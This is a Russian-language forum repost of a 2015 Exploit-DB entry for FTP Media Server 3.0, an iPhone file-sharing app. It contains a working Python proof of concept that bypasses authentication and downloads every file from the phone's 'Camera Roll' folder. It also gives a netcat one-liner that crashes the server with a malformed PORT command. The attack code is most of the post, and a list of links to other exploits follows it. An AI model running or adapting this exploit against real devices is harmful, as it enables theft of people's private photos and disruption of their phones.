Exploit FTP Media Server 3.0 - Authentication Bypass / Denial of Service

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37097
Проверка EDB
  1. Пройдено
Автор
WH1T3RH1N0 (MICHAEL ALLEN)
Тип уязвимости
REMOTE
Платформа
IOS
CVE
null
Дата публикации
2015-05-25
FTP Media Server 3.0 - Authentication Bypass / Denial of Service
Код: 
#!/usr/bin/env python
#==================================================================================
# Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service
# Date: 2015-05-25
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Exploit Author's Homepage: http://www.mikeallen.org
# Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302
# Version: 3.0
# Tested on: iPhone
#==================================================================================
# ------------------
# Denial of Service:
# ------------------
# The FTP server does not properly handle errors raised by invalid 
# FTP commands. The following command, which sends an invalid PORT command to 
# the FTP server, will crash the server once it is received.

# echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000

# ----------------------
# Authentication Bypass:
# ----------------------
# The FTP server does not handle unauthenticated connections or incorrect login
# credentials properly. A remote user can issue commands to the FTP server 
# without authenticating or after entering incorrect credentials.

# The following proof-of-concept connects to the given FTP server and 
# downloads all files stored in the "Camera Roll" folder without providing a
# username or password:

import sys
from ftplib import FTP

if len(sys.argv) <= 1:
    print "Usage: ./ftp-nologin.py [host] [port]"
    exit()

host = sys.argv[1]    
port = int(sys.argv[2])

files = []

def append_file(s):
    files.append(s.split(' ')[-1])

blocks = []
def get_blocks(d):
    blocks.append(d)

ftp = FTP()
print ftp.connect(host, port)
ftp.set_pasv(1)
ftp.cwd("Camera Roll")
print ftp.retrlines('LIST', append_file)

files.pop(0)

for filename in files:
    print "Downloading %s..." % filename
    ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks)

    f = open(filename, 'wb')
    for block in blocks:
        f.write(block)
    f.close()
    print "[+] File saved to: %s" % filename
    
    blocks = []

ftp.quit()
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Serviio Media Server - checkStreamUrl Command Execution (Metasploit)
Ответы
0
Просмотры
679
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Keene Digital Media Server 1.0.2 - Cross-Site Scripting
Ответы
0
Просмотры
336
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Keene Digital Media Server 1.0.2 - Directory Traversal
Ответы
0
Просмотры
341
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Adobe Flash Media Server 4.0.2 - Null Pointer Dereference Remote Denial of Service
Ответы
0
Просмотры
390
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Sights 'N Sounds Streaming Media Server 2.0.3 - 'SWS.exe' Buffer Overflow
Ответы
0
Просмотры
283
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial of Service
Ответы
0
Просмотры
266
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit firefly media server (mt-daapd) 2.4.1 / svn 1699 - Multiple Vulnerabilities
Ответы
0
Просмотры
303
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Firefly Media Server 0.2.4 - Remote Denial of Service
Ответы
0
Просмотры
287
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion
Ответы
0
Просмотры
259
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
Ответы
0
Просмотры
709
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу